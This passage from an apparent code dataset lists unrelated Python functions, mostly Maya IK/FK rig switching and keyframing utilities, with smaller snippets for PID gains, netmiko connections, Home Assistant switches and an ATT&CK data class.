pm.warning('{} has no IK|FK keyframe at frame {}' \\\n .format(robot, current_frame))\n continue\n\n # If there is a keyframe on the IK attribute, we also check if there's\n # a keyframe on an FK controller as well, as we only consider there to\n # be a proper IK or FK keyframe if both are true\n # Note, we only need to check a single FK controller as they should all\n # be keyframed (or not) together\n fk_test_handle_path = format_path(__A1_FK_CTRL_PATH + '.rotateY', robot)\n fk_key = pm.keyframe(fk_test_handle_path,\n query=True,\n time=current_frame)\n # If there is no keyframe set on the FK controller attribute,\n # continue to the next robot\n if not fk_key:\n pm.warning('{} has no IK|FK keyframe at frame {}' \\\n .format(robot, current_frame))\n continue \n\n for obj in keyed_attrs:\n for attr in keyed_attrs[obj]:\n pm.cutKey(format_path(obj, robot),\n time=current_frame,\n attribute=attr,\n option=\"keys\")\n\n if pm.objExists(tool_ctrl_path):\n pm.cutKey(tool_ctrl_path,\n 
time=current_frame,\n attribute='visibility',\n option=\"keys\")\n\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='translate',\n option=\"keys\")\n pm.cutKey(tool_ctrl_path,\n time=current_frame,\n attribute='rotate',\n option=\"keys\")\n else:\n pm.cutKey(target_ctrl_path,\n time=current_frame,\n attribute='translate',\n option=\"keys\")\n pm.cutKey(target_ctrl_path,\n time=current_frame,\n attribute='rotate',\n option=\"keys\")", "def key_ik_fk(*args):\n if not pm.window(\"mimic_win\", exists=True):\n return\n\n current_tab = pm.tabLayout('switcher_tab_layout',\n query=True,\n selectTabIndex=True)\n\n try:\n if current_tab == 1:\n key_ik()\n elif current_tab == 2:\n key_fk()\n except:\n pm.warning('Error keying IK/FK')", "def get_Amn_one_k(self, ik):\n raise NotImplementedError(\n \"The get_Amn_one_k method is should be overrided.\")", "def key_fk(*args):\n\n robots = get_robot_roots()\n if not robots:\n pm.warning('No robots selected')\n return\n\n for robot in robots:\n # If the robot's IK attribute is on, switch the robot to\n # FK mode before proceeding\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n if pm.getAttr(target_ctrl_path + '.ik'):\n switch_to_fk(robot)\n\n # We first check if the target/tool controller transformation and\n # orientation is already aligned with the FK chain. If so, it\n # indicates that we're performing an IK to FK switch, and we\n # keyframe its position and orientation directly, without\n # snapping the IK control to the FK hierarchy. This is to avoid\n # unneccessarily changing the controllers Euler Angle rotation\n # representation that can cause unpredictable behavior between frames\n\n if pm.objExists(tool_ctrl_path):\n ctrl_ik = tool_ctrl_path\n ctrl_fk = format_path(__TOOL_CTRL_FK_PATH, robot)\n\n # If robot doesn't have a tool controller, use target_CTRL.\n else:\n ctrl_ik = target_ctrl_path\n ctrl_fk = format_path(__TCP_HDL_PATH, robot)\n\n if not _ik_and_fk_aligned(ctrl_ik, ctrl_fk):\n _snap_ik_target_to_fk(robot)\n\n # Key all FK elements\n try:\n pm.setKeyframe(format_path(__A1_FK_CTRL_PATH, robot),\n attribute='rotateY')\n pm.setKeyframe(format_path(__A2_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A3_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A4_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n pm.setKeyframe(format_path(__A5_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A6_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n\n # Key visibility of FK controllers\n for i in range(6):\n pm.setKeyframe(format_path(__FK_CTRLS_PATH, robot),\n attribute='visibility')\n except:\n pm.warning('Error setting FK keys in FK mode')\n\n # Key all IK elements\n try:\n pm.setKeyframe(target_ctrl_path, attribute='ik')\n pm.setKeyframe(target_ctrl_path, attribute='v', value=0)\n\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='v')\n\n # Key tool controllers\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='translate')\n pm.setKeyframe(tool_ctrl_path, attribute='rotate')\n else:\n pm.setKeyframe(target_ctrl_path, attribute='translate')\n pm.setKeyframe(target_ctrl_path, attribute='rotate')\n\n except:\n pm.warning('Error setting IK keys in FK mode')", "def _ik_and_fk_aligned(ik_ctrl, tcp_handle):\n\n # 
Define some small number to threshold our output\n delta = .0001\n\n # Initialize variables\n # translation_is_aligned = False\n # rotation_is_aligned = False\n ik_fk_are_aligned = False\n\n # Find the translation of each object and compare them\n ik_trans = pm.xform(ik_ctrl, q=True, rp=True, ws=True)\n tcp_trans = pm.xform(tcp_handle, q=True, rp=True, ws=True)\n\n # Find the distance between the ik controller and the tcp handle\n trans_diff = math.sqrt((ik_trans[0] - tcp_trans[0]) ** 2\n + (ik_trans[1] - tcp_trans[1]) ** 2\n + (ik_trans[2] - tcp_trans[2]) ** 2)\n\n if round(trans_diff, 6) < delta:\n ik_fk_are_aligned = True\n\n return ik_fk_are_aligned", "def make_knode(self,i,path_len=0):\n return Knode(path_len=path_len,\\\n ident=self.nodes[i].ident,\\\n lindex=i)", "def __setattr__(self, k, v):\n if k[:1] != '_' and \\\n not k in ('dimensions', 'typecode'):\n if k not in self._ncattrs:\n self._ncattrs += (k, )\n object.__setattr__(self, k, v)", "def setKi(self, integral_gain):\n self.__Ki = integral_gain", "def _establish_netmiko_handler(self, opt, net_connect_dict):\n\n key = opt['ip']\n try:\n net_connect = ConnectHandler(**opt)\n except NetMikoTimeoutException as error:\n reason = error.message\n raise ValueError('[Netmiko Timeout Exception:] %s' % reason)\n except NetMikoAuthenticationException as error:\n reason = error.message\n raise ValueError('[Netmiko Authentication Exception:] %s' % reason)\n except SSHException as error:\n reason = error.message\n raise ValueError('[SSH Exception:] %s' % reason)\n except Exception as error:\n reason = error.message\n raise ValueError('Failed to connect to switch %s' % reason)\n return net_connect", "def _add_control_channel(self, attrs):\n _cable_data = {}\n _cable_data[\"crate\"] = self._crate\n _cable_data[\"module\"] = self._module\n _cable_data[\"channel\"] = int(attrs.get('number', \"\"))\n _cable_data[\"name\"] = str(attrs.get('name', \"\"))\n self._data.append(_cable_data)", "def _snap_ik_target_to_fk(robot):\n\n # Snap IK Ctrl to FK location\n # If robot has tool controller, use that\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n tool_ctrl_fk_path = get_tool_ctrl_fk_path(robot)\n tcp_hdl_path = format_path(__TCP_HDL_PATH, robot)\n\n if pm.objExists(tool_ctrl_path):\n ctrl_ik = tool_ctrl_path\n ctrl_fk = tool_ctrl_fk_path\n\n # If robot doesn't have a tool controller, use target_CTRL.\n else:\n ctrl_ik = target_ctrl_path\n ctrl_fk = tcp_hdl_path\n\n # Snap tool_CTRL to tool_CTRL_FK.\n try:\n pm.snapTransforms(s=ctrl_fk, d=ctrl_ik)\n except:\n pm.warning('Coundn\\'t snap {} tool_CTRL handle to FK' \\\n .format(robot))", "def ikFkMatch(\n namespace,\n ikfk_attr,\n ui_host,\n fks,\n ik,\n upv,\n ik_rot=None,\n key=None):\n\n # returns a pymel node on the given name\n def _get_node(name):\n # type: (Text) -> pm.nodetypes.Transform\n name = anim_utils.stripNamespace(name)\n if namespace:\n node = anim_utils.getNode(\":\".join([namespace, name]))\n else:\n node = anim_utils.getNode(name)\n\n if not node:\n mgear.log(\"Can't find object : {0}\".format(name), mgear.sev_error)\n\n return node\n\n # returns matching node\n def _get_mth(name):\n # type: (str) -> pm.nodetypes.Transform\n tmp = name.split(\"_\")\n tmp[-1] = \"mth\"\n query = \"_\".join(tmp)\n n = _get_node(query)\n\n if not n:\n mgear.log(\"Can't find mth object : {0} for {1}\".format(query, name), mgear.sev_comment)\n return _get_node(name)\n else:\n return n\n\n # get things ready\n fk_ctrls = [_get_node(x) for x in fks]\n 
fk_goals = [_get_mth(x) for x in fks]\n ik_ctrl = _get_node(ik)\n ik_goal = _get_mth(ik)\n upv_ctrl = _get_node(upv)\n\n if ik_rot:\n ik_rot_node = _get_node(ik_rot)\n ik_rot_goal = _get_mth(ik_rot)\n\n ui_node = _get_node(ui_host)\n o_attr = ui_node.attr(ikfk_attr)\n\n switch_to_fk = (o_attr.get() == 1.0)\n switch_to_ik = (not switch_to_fk)\n\n # sets keyframes before snapping\n if key:\n _all_controls = []\n _all_controls.extend(fk_ctrls)\n _all_controls.extend([ik_ctrl, upv_ctrl, ui_node])\n if ik_rot:\n _all_controls.extend([ik_rot_node])\n [cmds.setKeyframe(\"{}\".format(elem),\n time=(cmds.currentTime(query=True) - 1.0))\n for elem in _all_controls]\n\n # if is IKw then snap FK\n if switch_to_fk:\n\n world_matrices = []\n for src, _ in zip(fk_goals, fk_ctrls):\n world_matrices.append(getMatrix(src))\n\n o_attr.set(0.0)\n\n for mat, dst in zip(world_matrices, fk_ctrls):\n setMatrix(dst, mat)\n\n for mat, dst in zip(world_matrices, fk_ctrls):\n setMatrix(dst, mat)\n\n # if is FKw then sanp IK\n elif switch_to_ik:\n\n shoulder_mat = getMatrix(fk_goals[0])\n ik_mat = getMatrix(ik_goal)\n\n # transform.matchWorldTransform(ik_goal, ik_ctrl)\n if ik_rot:\n rot_mat = getMatrix(ik_rot_goal)\n # transform.matchWorldTransform(ik_rot_goal, ik_rot_node)\n\n upv_mat = getMatrix(fk_goals[2])\n\n o_attr.set(1.0)\n\n setMatrix(ik_ctrl, ik_mat)\n setMatrix(upv_ctrl, upv_mat)\n # for _ in range(10):\n # fk_ctrls[0].setMatrix(shoulder_mat, worldSpace=True)\n\n for _ in range(20):\n cmds.xform(fk_ctrls[0].name(), ws=True, matrix=shoulder_mat)\n if ik_rot:\n setMatrix(ik_rot_node, rot_mat)\n\n # transform.matchWorldTransform(fk_goals[1], upv_ctrl)\n # calculates new pole vector position\n start_end = (fk_goals[-1].getTranslation(space=\"world\") - fk_goals[1].getTranslation(space=\"world\"))\n start_mid = (fk_goals[2].getTranslation(space=\"world\") - fk_goals[1].getTranslation(space=\"world\"))\n\n dot_p = start_mid * start_end\n proj = float(dot_p) / float(start_end.length())\n proj_vector = start_end.normal() * proj\n arrow_vector = (start_mid - proj_vector) * 1.5\n arrow_vector *= start_end.normal().length()\n final_vector = (arrow_vector + fk_goals[2].getTranslation(space=\"world\"))\n upv_ctrl.setTranslation(final_vector, space=\"world\")\n\n # sets blend attribute new value\n # o_attr.set(1.0)\n roll_att = ui_node.attr(ikfk_attr.replace(\"blend\", \"roll\"))\n roll_att.set(0.0)\n\n setMatrix(ik_ctrl, ik_mat)\n if ik_rot:\n setMatrix(ik_rot_node, rot_mat)\n # upv_ctrl.setMatrix(upv_mat, worldSpace=True)\n for _ in range(20):\n cmds.xform(fk_ctrls[0].name(), ws=True, matrix=shoulder_mat)\n\n # sets keyframes\n if key:\n [cmds.setKeyframe(\"{}\".format(elem),\n time=(cmds.currentTime(query=True)))\n for elem in _all_controls]", "def setKi(self, integral_gain):\n self.Ki = integral_gain", "def setKi(self, integral_gain):\n\t\tself.Ki = integral_gain", "def make_control_knowledge_variables(self, horizon):\n # You might want to save your variables here, or feel free to make as\n # many data structures as you need to keep track of them.\n\n self.control_fluent_codes = {}\n\n \"\"\" *** YOUR CODE HERE *** \"\"\"\n\n # DID NOT DEFINE ANY EXTRA VARIABLES, ALL DONE IN THE METHOD BELOW", "def fk_to_ik(node):\n # Get relevant data\n ik_pole_off = get_parent(node.ik_pole_conn)\n\n world_trans_ik_pole_off = get_world_trans(ik_pole_off)\n world_trans_fk_01 = get_world_trans(node.fk_01_conn)\n world_trans_fk_02 = get_world_trans(node.fk_02_conn)\n world_trans_fk_03 = get_world_trans(node.fk_03_conn)\n 
world_trans_ik_pole = get_world_trans(node.ik_pole_conn)\n\n world_rot_fk_03 = get_world_rot(node.fk_03_conn)\n\n # calculate ik pole position\n ik_pole_mid_point = (world_trans_fk_01 + world_trans_fk_03) / 2\n ik_pole_base = world_trans_fk_02 - ik_pole_mid_point\n\n # Handle the case when the leg is fully stretched\n if ik_pole_base.length() <= 0.0001:\n rot_fk_01 = get_rot_as_quat(node.fk_01_conn)\n rot_fk_02 = get_rot_as_quat(node.fk_02_conn)\n\n rot = rot_fk_01 * rot_fk_02\n\n ik_pole_base = oMa.MVector(2 * (rot.x * rot.z + rot.w * rot.y),\n 2 * (rot.y * rot.z - rot.w * rot.x),\n 1 - 2 * (rot.x * rot.x + rot.y * rot.y))\n\n ik_pole_len = (world_trans_ik_pole - world_trans_fk_02).length()\n\n pos_ik_pole = world_trans_fk_02 + ik_pole_base.normalize() * ik_pole_len - world_trans_ik_pole_off\n\n # Get the destination MPlugs\n ik_main_trans_plugs = get_trans_plugs(node.ik_main_conn)\n ik_main_rot_plugs = get_rot_plugs(node.ik_main_conn)\n ik_pole_trans_plugs = get_trans_plugs(node.ik_pole_conn)\n\n # Set the new values\n for i, plug in enumerate(ik_main_trans_plugs):\n plug.setFloat(world_trans_fk_03[i])\n\n for i, plug in enumerate(ik_main_rot_plugs):\n plug.setMAngle(oMa.MAngle(world_rot_fk_03[i], oMa.MAngle.kRadians))\n\n for i, plug in enumerate(ik_pole_trans_plugs):\n plug.setFloat(pos_ik_pole[i])", "def attach_tool_controller(*args):\n\n sel = pm.ls(selection=True, type='transform')\n robot = get_robot_roots()\n\n # Exception handling\n if not sel:\n pm.warning('Nothing selected; ' \\\n 'select a valid robot control and tool controller')\n return\n if not robot:\n pm.warning('No robot selected; ' \\\n 'select a valid robot')\n return\n if len(robot) > 1:\n pm.warning('Too many robots selected; ' \\\n 'select a single robot')\n return\n if len(sel) > 2:\n pm.warning('Too many selections; ' \\\n 'select a single robot control, and single tool controller')\n return\n if len(sel) == 1:\n pm.warning('Not enough selections; ' \\\n 'select a single robot control, and single tool control')\n return\n if pm.objExists(get_tool_ctrl_path(robot[0])):\n pm.warning('Robot already has an assigned tool controller')\n return\n\n robot = robot[0] \n\n ns = robot.namespace()\n robot_grp_path = format_path(__ROBOT_GRP_PATH, robot)\n\n # find which selected object is the tool controller\n if not get_robot_roots(0, [sel[0]]):\n tool_ctrl = sel[0]\n else:\n tool_ctrl = sel[1]\n \n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n tool_ctrl_fk_path = get_tool_ctrl_fk_path(robot)\n\n try:\n pm.parent(tool_ctrl, robot_grp_path, absolute=True)\n pm.rename(robot_grp_path + '|' + tool_ctrl, '{}tool_CTRL'.format(ns))\n \n pm.parentConstraint(tool_ctrl_path,\n target_ctrl_path,\n name='targetToToolCtrl_pCnst',\n maintainOffset=True)\n\n # Duplicate and add to FK parent chain\n tool_ctrl_dup = pm.duplicate(tool_ctrl_path)\n pm.rename(tool_ctrl_dup, '{}tool_CTRL_FK'.format(ns))\n pm.parent('{0}|{1}robot_GRP|{1}tool_CTRL_FK'.format(robot, ns),\n format_path(__TCP_HDL_PATH, robot),\n absolute=True)\n pm.setAttr(tool_ctrl_fk_path + '.v', 0)\n\n # Lock rotation/translation of IK/FK CTRL (only works if prefs | file\n # references | edits on references is checked)\n\n try:\n \n pm.setAttr(target_ctrl_path + '.translate', lock=True)\n pm.setAttr(target_ctrl_path + '.rotate', lock=True)\n\n pm.setAttr(tool_ctrl_fk_path + '.translate', lock=True)\n pm.setAttr(tool_ctrl_fk_path + '.rotate', lock=True)\n\n except:\n pass\n\n pm.select(tool_ctrl_path)\n pm.headsUpMessage('Tool 
Controller attatched successfuly!')\n except:\n pm.warning('Error attaching tool controller')", "def __init__(\n self,\n netatmo_device: NetatmoDevice,\n ) -> None:\n super().__init__(netatmo_device.data_handler)\n\n self._switch = cast(NaModules.Switch, netatmo_device.device)\n\n self._id = self._switch.entity_id\n self._attr_name = self._device_name = self._switch.name\n self._model = self._switch.device_type\n self._config_url = CONF_URL_CONTROL\n\n self._home_id = self._switch.home.entity_id\n\n self._signal_name = f\"{HOME}-{self._home_id}\"\n self._publishers.extend(\n [\n {\n \"name\": HOME,\n \"home_id\": self._home_id,\n SIGNAL_NAME: self._signal_name,\n },\n ]\n )\n self._attr_unique_id = f\"{self._id}-{self._model}\"\n self._attr_is_on = self._switch.on", "def setKi(self, integral_gain):\r\n self.Ki = integral_gain", "def generate_control_mappings(self, control):\n acr_creator = all_models.AccessControlRole.query.filter_by(\n name=\"Creators\", object_type=\"Assessment\"\n ).first()\n with factories.single_commit():\n person = factories.PersonFactory()\n asmnt_ids = []\n for _ in range(2):\n asmnt = factories.AssessmentFactory()\n asmnt_ids.append(asmnt.id)\n factories.AccessControlListFactory(\n object=asmnt, person=person, ac_role=acr_creator\n )\n\n for asmnt_id in asmnt_ids:\n asmnt = all_models.Assessment.query.get(asmnt_id)\n self.gen.generate_relationship(source=asmnt, destination=control)", "def _CreateNewNic(self, idx, params, private):\n mac = params[constants.INIC_MAC]\n ip = params.get(constants.INIC_IP, None)\n net = params.get(constants.INIC_NETWORK, None)\n name = params.get(constants.INIC_NAME, None)\n net_uuid = self.cfg.LookupNetwork(net)\n #TODO: not private.filled?? can a nic have no nicparams??\n nicparams = private.filled\n nobj = objects.NIC(mac=mac, ip=ip, network=net_uuid, name=name,\n nicparams=nicparams)\n nobj.uuid = self.cfg.GenerateUniqueID(self.proc.GetECId())\n\n changes = [\n (\"nic.%d\" % idx,\n \"add:mac=%s,ip=%s,mode=%s,link=%s,network=%s\" %\n (mac, ip, private.filled[constants.NIC_MODE],\n private.filled[constants.NIC_LINK], net)),\n ]\n\n if self.op.hotplug:\n msg = self._HotplugDevice(constants.HOTPLUG_ACTION_ADD,\n constants.HOTPLUG_TARGET_NIC,\n nobj, None, idx)\n changes.append((\"nic.%d\" % idx, msg))\n\n return (nobj, changes)", "def add_item(controller_widget, control_name, control_instance):\n # Get a new key name\n trait_name = 'new_item'\n i = 1\n while control_instance.controller.trait(trait_name):\n trait_name = 'new_item_%d' % i\n i += 1\n\n # Add the new trait to the inner list controller\n control_instance.controller.add_trait(\n trait_name, control_instance.inner_trait)\n\n # update interface\n control_instance.controller_widget.update_controls()\n # update the real underlying dict object\n control_instance.controller_widget.update_controller()\n\n logger.debug(\"Add 'ControllerControlWidget' '{0}' new trait \"\n \"callback.\".format(trait_name))", "def __init__(self, attck_obj = None, **kwargs):\n\n super(AttckTools, self).__init__(**kwargs)\n self.attck_obj = attck_obj\n\n self.id = self._set_id(kwargs)\n self.name = self._set_attribute(kwargs, 'name')\n self.alias = self._set_attribute(kwargs, 'aliases')\n self.description = self._set_attribute(kwargs, 'description')\n self.reference = self._set_reference(kwargs)\n self.created = self._set_attribute(kwargs, 'created')\n self.modified = self._set_attribute(kwargs, 'modified')\n self.stix = self._set_attribute(kwargs, 'id')\n self.type = self._set_attribute(kwargs, 
'type')\n self.wiki = self._set_wiki(kwargs)\n self.contributor = self._set_attribute(kwargs, 'contributor')\n\n self.set_relationships(self.attck_obj)\n\n if AttckTools.__ATTCK_C2_DATASETS is None or AttckTools.__ATTCK_TOOLS_DATASETS is None:\n try:\n data = AttckDatasets().generated_attck_data()\n except:\n raise GeneratedDatasetException('Unable to retrieve generated attack data properties')\n if AttckTools.__ATTCK_C2_DATASETS is None:\n if 'c2_data' in data:\n AttckTools.__ATTCK_C2_DATASETS = data['c2_data']\n if AttckTools.__ATTCK_TOOLS_DATASETS is None:\n if 'tools' in data:\n AttckTools.__ATTCK_TOOLS_DATASETS = data['tools']\n\n self.c2_data = self.__get_c2_dataset()\n self.external_dataset = self.__get_tools_dataset()", "def learn_ICA(X, k):\n\n # TODO: YOUR CODE HERE", "def __setattr__(self, x, kid):\r\n if isinstance(kid, Morphology):\r\n if kid is None:\r\n del self[x]\r\n else:\r\n self[x] = kid\r\n else: # If it is not a subtree, then it's a normal class attribute\r\n object.__setattr__(self, x, kid)", "def __init__(self, env, action_repeat=1):\n super().__init__(env)\n if self.env.mujoco_robot.name == \"sawyer\":\n from robosuite.controllers import SawyerIKController\n\n self.controller = SawyerIKController(\n bullet_data_path=os.path.join(robosuite.models.assets_root, \"bullet_data\"),\n robot_jpos_getter=self._robot_jpos_getter,\n )\n elif self.env.mujoco_robot.name == \"baxter\":\n from robosuite.controllers import BaxterIKController\n\n self.controller = BaxterIKController(\n bullet_data_path=os.path.join(robosuite.models.assets_root, \"bullet_data\"),\n robot_jpos_getter=self._robot_jpos_getter,\n )\n else:\n raise Exception(\n \"Only Sawyer and Baxter robot environments are supported for IK \"\n \"control currently.\"\n )\n\n self.action_repeat = action_repeat", "def set_node_attributes(G, attr_name):\n if attr_name == 'k-index':\n core_number = nx.core_number(G)\n nx.set_node_attributes(G, core_number, name=attr_name)\n else:\n print('Unknown attribute name:', attr_name)", "def __init__(\n self, upv_object, protect_data, server_info, camera_id, switch, ir_on, ir_off\n ):\n super().__init__(upv_object, protect_data, server_info, camera_id, switch)\n self.upv = upv_object\n switch_type = SWITCH_TYPES[switch]\n self._name = f\"{switch_type[_SWITCH_NAME]} {self._camera_data['name']}\"\n self._icon = f\"mdi:{switch_type[_SWITCH_ICON]}\"\n self._ir_on_cmd = ir_on\n self._ir_off_cmd = ir_off\n self._switch_type = switch_type[_SWITCH_TYPE]", "def __init__(\n self,\n switch_type: str,\n switch_name: str,\n tm_client: TransmissionClient,\n client_name: str,\n ) -> None:\n self._attr_name = switch_name\n self.type = switch_type\n self._tm_client = tm_client\n self._state = STATE_OFF\n self._data = None\n self.unsub_update: Callable[[], None] | None = None\n self._attr_unique_id = f\"{tm_client.config_entry.entry_id}-{switch_type}\"\n self._attr_device_info = DeviceInfo(\n entry_type=DeviceEntryType.SERVICE,\n identifiers={(DOMAIN, tm_client.config_entry.entry_id)},\n manufacturer=\"Transmission\",\n name=client_name,\n )", "def _make_acquisition_controllers(self, auto_init=True):\n for instance_name, _ in self.config_data[\"controllers\"].items():\n self._acquisition_controllers[\n instance_name\n ] = RemoteAcquisitionControl(\n instance_name=instance_name,\n config_data=self.config_data,\n control_socket_wrapper=self._control_socket,\n auto_init=auto_init,\n )", "def createLayeredSplineIK(jnts, name, rig=None, side='C', extraName='', parent=None, dyn=False):\n moduleName = 
utils.setupBodyPartName(extraName, side)\n col = utils.getColors(side)\n ## create base layer jnts\n tmpCrv = utils.createCrvFromObjs(jnts, crvName='tmpCrv')\n ctrlGrp = utils.newNode('group', name='{}{}Ctrls'.format(extraName, name), side=side,\n parent=rig.ctrlsGrp.name if rig else None, skipNum=True)\n mechGrp = utils.newNode('group', name='{}{}Mech'.format(extraName, name), side=side,\n parent=rig.mechGrp.name if rig else None, skipNum=True)\n baseJnts = utils.createJntsFromCrv(tmpCrv, numOfJnts=4, side=side,\n name='{}{}_baseLayer'.format(extraName, name))\n if rig:\n cmds.parent(jnts[0], rig.skelGrp.name)\n cmds.parent(baseJnts[0], mechGrp.name)\n ## parent locs to base jnts\n ## base layer ctrls\n baseLayerLocs = []\n baseLayerCtrls = []\n baseCtrlParent = ctrlGrp.name\n for each in baseJnts:\n baseLoc = utils.newNode('locator', name='{}{}_baseLayer'.format(extraName, name),\n side=side)\n baseLoc.parent(each, relative=True)\n utils.setShapeColor(baseLoc.name, color=None)\n baseLayerLocs.append(baseLoc)\n baseCtrl = ctrlFn.ctrl(name='{}{}_baseLayer'.format(extraName, name), guide=each,\n side=side, parent=baseCtrlParent, rig=rig,\n scaleOffset=rig.scaleOffset)\n baseCtrl.constrain(each)\n baseCtrl.modifyShape(shape='cube', color=col['col2'], scale=(1, 1, 1))\n baseLayerCtrls.append(baseCtrl)\n baseCtrlParent = baseCtrl.ctrlEnd\n baseSpaces = [rig.globalCtrl.ctrlEnd]\n if parent:\n baseSpaces.insert(0, parent)\n baseLayerCtrls[0].spaceSwitching(parents=baseSpaces, niceNames=None,\n constraint='parent', dv=0)\n\n ## mid layer crv FROM BASE JNTS\n midCrv = utils.createCrvFromObjs(baseJnts, crvName='{}_midLayer'.format(name),\n side=side, extraName=extraName)\n ## create mid jnts\n midJnts = utils.createJntsFromCrv(tmpCrv, numOfJnts=7, side=side,\n name='{}{}_midLayer'.format(extraName, name))\n cmds.parent(midJnts[0], mechGrp.name)\n cmds.delete(tmpCrv)\n ## parent locs to mid jnts\n ## create mid ctrls - parent constrain root grp to mid jnts\n midLayerLocs = []\n midLayerCtrls = []\n midCtrlParent = ctrlGrp.name\n for each in midJnts:\n midCtrl = ctrlFn.ctrl(name='{}{}_midLayer'.format(extraName, name), guide=each,\n side=side, parent=midCtrlParent, rig=rig,\n scaleOffset=rig.scaleOffset)\n cmds.parentConstraint(each, midCtrl.rootGrp.name, mo=1)\n midCtrl.modifyShape(shape='sphere', color=col['col1'], scale=(0.4, 0.4, 0.4))\n midLayerCtrls.append(midCtrl)\n midLoc = utils.newNode('locator', name='{}{}_midLayer'.format(extraName, name),\n side=side)\n utils.setShapeColor(midLoc.name, color=None)\n midLoc.parent(midCtrl.ctrlEnd, relative=True)\n midLayerLocs.append(midLoc)\n midCtrlParent = midCtrl.ctrlEnd\n ## ik spline mid crv to mid jnts\n midIKSpline = ikFn.ik(sj=midJnts[0], ej=midJnts[-1],\n name='{}{}_midLayerIK'.format(extraName, name), side=side)\n midIKSpline.createSplineIK(crv=midCrv, parent=mechGrp.name)\n midIKSpline.addStretch(operation='both', mode='length',\n globalScaleAttr=rig.scaleAttr if rig else None)\n midIKSpline.advancedTwist(baseLayerCtrls[0].ctrlEnd, endObj=baseLayerCtrls[-1].ctrlEnd,\n wuType=4)\n ## connect mid crv cvs to base locators\n for i, each in enumerate(baseLayerLocs):\n cmds.connectAttr('{}.wp'.format(each.name), '{}Shape.cv[{}]'.format(midCrv, i))\n ## create skin crv FROM MID JNTS\n skinCrvIn = utils.createCrvFromObjs(midJnts, side=side, extraName=extraName,\n crvName='{}_skinLayer{}'.format(name,\n 'DynIn' if dyn else ''))\n skinCrvInShape = cmds.listRelatives(skinCrvIn, s=1)[0]\n if dyn:\n dynMechGrp = utils.newNode('group', 
name='{}Dynamics'.format(name), side=side,\n parent=mechGrp.name, skipNum=True)\n cmds.parent(skinCrvIn, dynMechGrp.name)\n skinCrv = utils.createCrvFromObjs(midJnts, crvName='{}_skinLayer'.format(name),\n side=side, extraName=extraName)\n ## create output curve\n dynOutCrv = utils.createCrvFromObjs(midJnts, side=side, extraName=extraName,\n crvName='{}_skinLayerDynOut'.format(name))\n cmds.parent(dynOutCrv, dynMechGrp.name)\n dynOutCrvShape = cmds.listRelatives(dynOutCrv, s=1)[0]\n ## create follicle\n fol = utils.newNode('follicle', name='{}_skinLayerDyn'.format(name), side=side,\n parent=dynMechGrp.name)\n cmds.setAttr('{}.restPose'.format(fol.name), 1)\n cmds.setAttr('{}.startDirection'.format(fol.name), 1)\n cmds.setAttr('{}.degree'.format(fol.name), 3)\n ## create hair system\n hs = utils.newNode('hairSystem', name='{}_skinLayerDyn'.format(name), side=side,\n parent=dynMechGrp.name)\n ## create nucleus\n nuc = utils.newNode('nucleus', name='{}_skinLayerDyn'.format(name), side=side,\n parent=dynMechGrp.name)\n ## connect shit\n fol.connect('startPosition', '{}.local'.format(skinCrvInShape), mode='to')\n fol.connect('startPositionMatrix', '{}.wm'.format(skinCrvIn), mode='to')\n fol.connect('currentPosition', '{}.outputHair[0]'.format(hs.name), mode='to')\n fol.connect('outCurve', '{}.create'.format(dynOutCrvShape), mode='from')\n fol.connect('outHair', '{}.inputHair[0]'.format(hs.name), mode='from')\n hs.connect('currentState', '{}.inputActive[0]'.format(nuc.name), mode='from')\n hs.connect('startState', '{}.inputActiveStart[0]'.format(nuc.name), mode='from')\n hs.connect('nextState', '{}.outputObjects[0]'.format(nuc.name), mode='to')\n hs.connect('startFrame', '{}.startFrame'.format(nuc.name), mode='to')\n hs.connect('currentTime', 'time1.outTime', mode='to')\n nuc.connect('currentTime', 'time1.outTime', mode='to')\n ## blend shape curves\n blendNode = cmds.blendShape(skinCrvIn, dynOutCrv, skinCrv,\n n='{}_{}Dynamics{}'.format(side, name, suffix['blend']))[0]\n ## connect blend shape to attribute\n ##- create dyn control\n dynCtrl = ctrlFn.ctrl(name='{}Settings'.format(name),\n guide='{}_{}SettingsGuide{}'.format(side, name, suffix['locator']),\n rig=rig, deleteGuide=True, side=side, skipNum=True,\n parent=rig.settingCtrlsGrp.name)\n dynCtrl.makeSettingCtrl(ikfk=False, parent=jnts[0])\n dynCtrl.addAttr('dynSwitch', nn='Dynamics Switch', minVal=0, maxVal=1, defaultVal=1)\n dynSwitchRev = utils.newNode('reverse', name='{}DynamicsSwitch'.format(name), side=side)\n cmds.connectAttr(dynCtrl.ctrl.dynSwitch, '{}.{}'.format(blendNode, dynOutCrv))\n dynSwitchRev.connect('inputX', dynCtrl.ctrl.dynSwitch, mode='to')\n dynSwitchRev.connect('outputX', '{}.{}'.format(blendNode, skinCrvIn), mode='from')\n\n else:\n skinCrv = skinCrvIn\n\n\n ## ik spline skin crv to skin jnts\n skinIKSpline = ikFn.ik(sj=jnts[0], ej=jnts[-1],\n name='{}{}_skinLayerIK'.format(extraName, name), side=side)\n skinIKSpline.createSplineIK(crv=skinCrv, parent=mechGrp.name)\n skinIKSpline.addStretch(operation='both', mode='length',\n globalScaleAttr=rig.scaleAttr if rig else None)\n skinIKSpline.advancedTwist(midLayerCtrls[0].ctrlEnd, endObj=midLayerCtrls[-1].ctrlEnd,\n wuType=4)\n ## connect skin crv cvs to mid locators\n for i, each in enumerate(midLayerLocs):\n cmds.connectAttr('{}.wp'.format(each.name), '{}Shape.cv[{}]'.format(skinCrvIn, i))\n\n ##", "def biped_stretch(ik_ctrl,\n ik_last_node,\n pv_ctrl,\n switch_ctrl,\n up_arm_fk_ctrl,\n lo_arm_fk_ctrl,\n 